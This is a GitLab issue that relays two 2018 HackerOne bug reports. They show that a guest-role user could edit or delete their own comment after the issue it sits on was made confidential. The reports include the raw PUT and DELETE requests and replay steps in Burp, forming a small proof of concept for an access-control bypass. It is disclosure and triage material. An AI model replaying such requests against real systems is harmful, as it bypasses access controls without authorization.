Guest user editing/deleting his own comments
An external contributor reported via HackerOne an issue regarding editing/deleting comments as a guest user. I could successfully reproduce the reported behavior and I would like to verify with the product team if this behavior is intended.
The HackerOne reports can be found at:
Please find the report details below.
Title: Guest permission user can edit his comment from other user's confidential issue in project Scope: *.gitlab.com Weakness: Privilege Escalation Severity: No Rating Link: https://hackerone.com/reports/406070 Date: 2018-09-05 13:10:13 +0000 By: @sandeep_hodkasia
Details:
NOTE! Thanks for submitting a report! Please replace all the [square] sections below with the pertinent details. Remember, the more detail you provide, the easier it is for us to triage and respond quickly, so be sure to take your time filling out the report!
Summary: Guest permission user can edit his comment from other user's confidential issue in project
Description: Guest role were not allowed to access other user's confidential issue, thus were not allowed to edit or delete any comment. But privilege escalation on the vulnerable request allows guest role user to edit his own comment and modify it from other user's confidential issue in project. Please note: Using this bug, Guest role user can edit own comment which have been created before the issue made confidential by other other user.
##Vulnerable request:
PUT /sandeep01/test/notes/99078322 HTTP/1.1
Host: gitlab.com
Connection: close
Content-Length: 65
Accept: application/json, text/plain, */*
Origin: https://gitlab.com
X-CSRF-Token: xxxx
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: https://gitlab.com/sandeep01/test/issues/4
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie:xxxx
target_type=issue&target_id=13921643¬e%5Bnote%5D=helloasdfghjk
Steps To Reproduce:
- Add any comment on other user's open issue in the project using guest role user account.
- Change the issue to confidential.
- Replay vulnerable request in burp using guest role user session.
- Use your target id and note id in the vulnerable request.
- Hit API
- Comment will be changed.
Impact
Guest role user can edit comment in confidential issue.
Title: Guest role user can delete his comment from other user's confidential issue in project Scope: *.gitlab.com Weakness: Privilege Escalation Severity: No Rating Link: https://hackerone.com/reports/406076 Date: 2018-09-05 13:32:39 +0000 By: @sandeep_hodkasia
Details: Summary: Guest role user can delete his comment from other user's confidential issue in project
Description: Guest role were not allowed to access other user's confidential issue in project, thus were not allowed to delete any comment. But privilege on the vulnerable request allows guest role user to delete his comment from other user's confidential issue in project. Please note that guest role user can only delete his comment, which have been created by him before the issue made confidential.
##Vulnerable request:
DELETE /sandeep01/test/notes/99077678 HTTP/1.1
Host: gitlab.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://gitlab.com/sandeep01/test/issues/4
X-CSRF-Token: xxxx
Content-Type: application/json;charset=utf-8
X-Requested-With: XMLHttpRequest
Cookie: xxxx
Connection: close
Steps To Reproduce:
- Add new comment in other users open issue in project using guest role user session.
- Change the issue to confidential issue.
- Replay vulnerable request in burp suite using guest role user session.
- Use your project name, issue name and note id in the vulnerable request.
- Hit API.
- Comment will be deleted.
Impact
Guest role user can delete comment from confidential issue.